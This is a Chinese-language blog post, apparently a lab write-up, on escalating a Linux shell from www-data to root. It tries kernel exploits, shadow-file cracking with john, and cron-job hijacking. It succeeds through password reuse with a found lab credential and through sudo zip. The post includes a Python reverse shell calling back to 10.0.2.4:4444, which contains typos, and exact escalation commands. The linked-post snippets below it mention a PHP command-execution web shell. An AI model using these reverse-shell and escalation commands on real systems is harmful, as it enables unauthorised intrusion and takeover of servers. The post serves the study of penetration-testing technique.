linux系统提权——基于已经拿到www-data权限

最新推荐文章于 2024-05-02 15:01:02 发布
最新推荐文章于 2024-05-02 15:01:02 发布
阅读量1.3w 收藏 39
点赞数 4
文章标签: linux 提权
m0re
本文链接:https://blog.csdn.net/qq_45836474/article/details/107873338
版权

前言:上次学习利用目录遍历漏洞获取了一个反弹的webshell,但是权限是www-data,不是root权限,所以这次学习提权,拿到root权限。

本文目录

提权介绍

往往我们能拿下服务器的web服务只是具有低权限用户(www-data),对于内网渗透,我们需要提权到root。linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置。
提权前提:

  • 已经拿到低权shell
  • 被入侵的机器上面有nc,python,perl等非常常见的工具
  • 有权限上传文件和下载文件

学习环境依然是上次的shell获取的www-data权限

提权方式

内核漏洞提权

内核漏洞一般是首选考虑的,先查看是否可以使用内核漏洞进行提权。先对系统做个了解

#查看发行版本
cat /etc/issue
cat /etc/*-release
# 查看内核版本
uname -a

m0re
看到发行版本是Ubuntu 12.04.5
寻找内核溢出代码使用searchsploit
但是发现并没有,可以适合这个版本的漏洞模块;但是有12.04的,不过不行;
m0re
没有这个,所以没办法利用;如果存在可以利用的,那么使用方法就是

gcc xxx.c -o exploit
chmod +x exploit
./exploit

这个是内核溢出的提权,不过一般用不上。

明文root密码提权

大多linux系统的密码都和/etc/passwd/etc/shadow这两个配置文件相关的;passwd里面储存了用户,shadow里面是密码的hash;且passwd是全用户可读,root可写。shadow是仅root可以进行读写的。
破解linux用户名和对应的密码

/etc/passwd  /etc/shadow
unshadow passwd shadow > cracked
john cracked

使用John这个工具来破解。
到kali中查看这两个文件,passwd可以查看,shadow是无法查看的
m0re
所以此方法也不行,不过倒是可以在root权限下查看密码(前提是不知道root密码)

计划任务

系统内可能会有一些定时执行的任务,一般这些任务由crontab来管理,具有所属用户的权限。非root权限的用户是不可以列出root用户的计划任务的。但是/etc/内系统的计划任务可以被列出
默认这些程序以root权限执行,如果刚好遇到一个把其中脚本配置成可以任意用户可写的,这个时候就可以修改脚本等回连rootshell;如果定时执行的文件时python脚本,可以使用下面的脚本来替换之前的脚本。

#!/usr/bin/python
import os,subprocess,socket

s=socket.socekt(sicket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.0.2.4","4444"))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

测试时查看/etc/crontab发现并没有可写权限的文件
m0re
所以此方法行不通。

密码复用

很多管理员会重读使用密码,因此数据库或者web后台的密码也许就是root密码。

有了疑似root密码,第一时间想到ssh登录,但是ssh很可能禁止root登录,或者是防火墙规则等因素排除。之前已经得到一个低权限的shell,但是直接在低权限里使用sudo是不奏效的。出于安全考虑,linux要求用户必须从终端设备(tty)中输入密码,而不是标准输入,也就是说sudo在输入密码的时候本质是读取键盘,而不是bash里面的字符。因此要输入密码,还需要一个终端设备。python有这种功能的,就是模拟化终端,输入

python -c "import pty;pty.spawn('/bin/bash')"

m0re

可以看到是已经启动了虚拟终端
然后找到了一些信息,因为是靶场,而且是学习提权的,这个寻找信息的过程就不写了。
找到一个用户名为zico密码为sWfCsfJSPV9H3AmQzw8的一个用户。
而日是开放了ssh服务的,所以可以直接进行ssh登录
m0re

看到了登录成功,密码正确。

利用zip进行提权
sudo -l查看了当前可以使用root提权的命令信息。
返回以下结果

Matching Defaults entries for zico on this host:
    env_reset, exempt_group=admin,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User zico may run the following commands on this host:
    (root) NOPASSWD: /bin/tar
    (root) NOPASSWD: /usr/bin/zip

可以使用zip进行提权

touch exploit
sudo -u root zip exploit.zip exploit -T --unzip-command="sh -c /bin/bash"

发现得到了root权限
m0re

总结:

  1. 内核漏洞
    在kali当中找相应版本的漏洞,看有无适应当前版本的可以利用的漏洞。
  2. 明文root密码
    要求拿到的用户,刚好有可以读取shadow和passwd文件的权限。
  3. 计划任务
    计划的任务修改执行对应的脚本可以获取root权限,待尝试~
  4. 密码复用
    已知其他用户的密码,可以推测root用户的密码也是相同的(PS:不得不说我自己的就是,我的kali普通用户和root用户设置的密码是一样的,因为懒)
    以上是几种常见的提权方式,这次学习收获很多。
m0re
关注
  • 4
    点赞
  • 39
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
提权—网站的权限后台漏洞第三方
qi_SJQ_的博客
01-30 4146
1.权限提升: 此处提权指的不是让网站的普通用户获取到管理员的权限(那属于网站的逻辑漏洞)而是我们已经利用网站的漏洞拿到了一些权限乃至webshell后如何利用网站权限进而获取到数据库、操作系统、服务器等的权限。 2.具体有哪些权限需要我们知道和了解掌握的? 后台权限、网站权限、数据库权限、接口权限系统权限、域控权限等。 1)后台权限(获得方式:爆破、注入猜解、弱口令等):一般网站或应用后台智能操作应用的界面内容、数据图片等信息,无法操作程序的源代码或服务器上的资源文件。(如后台功能存在文件操作的话.
linux www data 权限,Linux 权限管理
weixin_33478634的博客
05-06 1405
permission = mode(rwxrwxrwx) + ownershipownership文件的权限管理主要针对三类对象进行定义:owner:属主,ugroup:属组,gother:其他,omode每个文件针对每类访问者都定义了三种权限:r: Readablew: Writablex: eXecutable文件:(默认情况下,用户创建的文件没有执行权限)r:可使用文件查看类工具读取其内容w...
Linux下非交互式提权详解
01-20
前言 之前拿到某站的Webshell之后,在提权的时候发现网站不能反弹shell。而且,在渗透的时候经常遇到那种不能反弹shell的,你的提权工具拿上去之后因为没有交互式的环境,也不知道提权是否成功。因此,写了一个简单的工具。需要的朋友们可以参考学习。 方法如下 proce_open() // path是提权工具的绝对路径,例如:/usr/local/htdocs/2.6.18 // cmd是你需要执行的命令,例如:whoami if(isset($_GET['path']) && isset($_GET['cmd'])){ $path = $_GET['path']; $cmd = $
目录遍历&www提权
weixin_48876267的博客
10-23 511
1、首先探测靶机的信息 nmap -sV -T4 192.168.222.135 2、扫描网页目录 dirb http://192.168.222.135 nikto -host 192.168.222.135 发现利用nikto扫描网页时发现没有可以利用的信息。 在dirb中发现有个dbadmin的网页,访问网页查看 发现了网站登录后台 尝试弱密码 ------------------- 123456 123123 admin ------------------- admin 尝试成功.
最新Linux提权宝典_linux拿到权限webshell之后如何进行提权
最新发布
AUZKAY的博客
05-02 20
提权思路:大概思路是通过信息搜集查找可利用的文件/脚本/软件/用户/内核漏洞/恶意劫持/特定平台漏洞/框架漏洞/组件/等,写入或执行恶意命令/脚本/shell/添加高权限用户,提权成功,然后进一步利用。
CTF-目录遍历(拿到www-data用户权限)
不知名白帽的博客
05-25 594
CTF-目录遍历(拿到www-data用户权限),实验环境:kali(192.168.20.128),靶机(192.168.20.133)。通过信息探测发现特殊页面dbadmin,然后找到登录页面,通过弱口令进行登录。然后用ZAP扫描漏洞,发现是目录遍历漏洞,漏洞特征是../../../../../等,敏感页面上传php,通过上传的php访问本机写有大马的php文件,同时监听端口,反弹shell...
linux 提权总结_linux提权
2401_83946224的博客
04-11 1017
当visudo被禁用,可以尝试 sudo vim /etc/sudoers是否可以修改配置文件,从而达到可以sudo su,或者sudo bash的目标2.git当 sudo允许执行git命令的时候,可利用3.find 提权此时无法执行执行此时find无suid权限,但是可以sudo提权4.perl-e参数用来指定要运行的命令,然后使用linux的exec参数来调用bash.5.pythonpty(伪终端库) pty.spawn生成一个进程6.less。
Linux提权宝典
LiBai'S BLOG
02-14 7916
提权思路:大概思路是通过信息搜集查找可利用的文件/脚本/软件/用户/内核漏洞/恶意劫持/特定平台漏洞/框架漏洞/组件/等,写入或执行恶意命令/脚本/shell/添加高权限用户,提权成功,然后进一步利用。当拿到webshell权限时,由于权限太低有的命令和操作执行不了,所以这时候要提权。uname -a 命令看完Linux内核,直接上扫描器。扫描一下哪些EXP能用,然后直接拿EXP冲他。
linux 添加www用户,Linux把用户添加到组(www-data|sudo)
weixin_39614276的博客
04-29 2572
Post Views:149设置网站的根目录的用户和组为:www-datasudo chown -R www-data:www-data /var/www/html/sun@karat:/var/www$ ls -ltotal 4drwxr-xr-x 2 root root 4096 Jul 3 17:31 htmlsun@karat:/var/www$ sudo chown -R www-da...
www-data
weixin_30652271的博客
03-30 477
www-data is the user (and also group) that the service httpd (apache) is acting with on your system.--- www-data Some web servers run as www-data. Web content should not be owned by this ...
linux权限 www用户,linux用户权限管理
weixin_39828956的博客
04-28 2628
1基本概念Linux是一个多用户多任务的分时操作系统,任何一个要使用系统资源的用户,都必须首先向系统管理员申请一个账号, 然后以这个账号的身份进入系统。为了实现资源分派(系统管理员的权利)及出于安全的考虑,必须对用户进行不同权限的分配。用户组便于更高效地管理用户权限。用户操作Linux需要经过三个步骤的权限认证:Authentication:认证Authorization:授权Audit...
NMOS——R6030KNZ4C13-datasheet
04-10
R6030KNZ4C13-datasheet
chenyongzhe#programming-data#Linux文件系统与文件权限1
07-25
Linux文件系统与文件权限1 Linux文件系统Unix Like的文件系统包括两个概念:根文件系统和存储类文件系统根文件系统(rootfs:root fil
基于form-data请求格式详解
10-16
今天小编就为大家分享一篇基于form-data请求格式详解,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
Linux系统设计-Linux系统编程DataServer
01-10
Linux系统是一个免费使用和自由传播的类Unix操作系统,基于POSIX和UNIX的多用户、多任务、支持多线程和多CPU的操作系统。它继承了Unix以网络为核心的设计思想,是一个性能稳定的多用户网络操作系统Linux是许多企业...
uni-app uni-data-picker 省市区数据表
06-16
<uni-data-picker> 是一个选择类datacom组件。支持多列级联选择。列数没有限制,如果屏幕显示不全,顶部tab区域会左右滚动。 适用于uni-app使用uni-data-picker实现省市区选择器的json数据
基于Linux下的root提权骚操作
帅醉了的博客
01-30 5589
0x00_前言 小小博客,大大梦想。 博主还是小白,总结几个有关于在入侵靶机后,如何在Linux下的关于普通用户提权到root下的操作,如有错误或其他请多多包含,希望提出多交流。 0x01_操作简介 提权的三个骚操作: 内核溢出 明文密文解密 计划任何进程 密码复用 加粗样式 ...
简单linux本地提权,linux下简单提权实现
weixin_42498909的博客
05-21 598
今天个大家介绍一个linux下利用环境变量提权的方法。这个方法呢,首先是你要有一个sudo权限的账户。比如,我这里有个www账户,拥有sudo权限,然后我就利用这个www账户,提权到root权限。 欧克,下面开始提权。首先第一步,先登陆www账户,并在家目录下创建script文件夹 然后在家目录下创建c文件,文件名称随便你愿意,比如test.c,该文件内容如下: 保存文件内容后,用sudo权限g...
linux www data用户,linux – 在/ var / www中处理Apache 2用户www-data权限的最佳方法是什么?...
weixin_33642448的博客
05-14 285
尝试扩展@ Zoredache的answer,我自己给出了一个:>创建一个新组(www-pub)并将用户添加到该组groupadd www-pubusermod -a -G www-pub usera ##必须使用-a附加到现有组usermod -a -G www-pub userbgroups usera ##显示用户组>将/ var / www下所有内容的所有权更改为root:ww...
STM32——库函数版——超声波测距模块(HC-SR04)
07-27
HC-SR04超声波测距模块是一种常用的测距传感器,可以通过发送超声波脉冲并接收回波信号来测量距离。在STM32库函数版中,可以通过以下步骤来使用HC-SR04超声波测距模块: 1. 首先,需要包含"sys.h"头文件,并初始化HC_SR04超声波模块,可以使用HC_SR04_Init()函数进行初始化。\[1\] 2. 在测距之前,需要向Trig控制端输入至少10us的高电平触发信号,可以使用HC_SR04_start()函数发送20us的脉冲触发信号。\[1\] 3. HC-SR04模块内部会发送8个40KHz的方波并检测回波信号,一旦检测到回波信号,Echo接收端会输出高电平回响信号,高电平的持续时间就是超声波从发射到返回的时间。根据公式:距离=高电平时间*声速(340M/S)/2,可以计算出测得的距离。\[2\] 总结来说,使用STM32库函数版的HC-SR04超声波测距模块,需要初始化模块并发送触发信号,然后根据回响信号的高电平时间计算出距离。 #### 引用[.reference_title] - *1* *2* [STM32——库函数版——超声波测距模块](https://blog.csdn.net/qq_45844792/article/details/111215858)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [STM32连接HC-SR04超声波测距(结合STM32CubeMX和HAL库函数)](https://blog.csdn.net/wuwenbin12/article/details/118575989)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值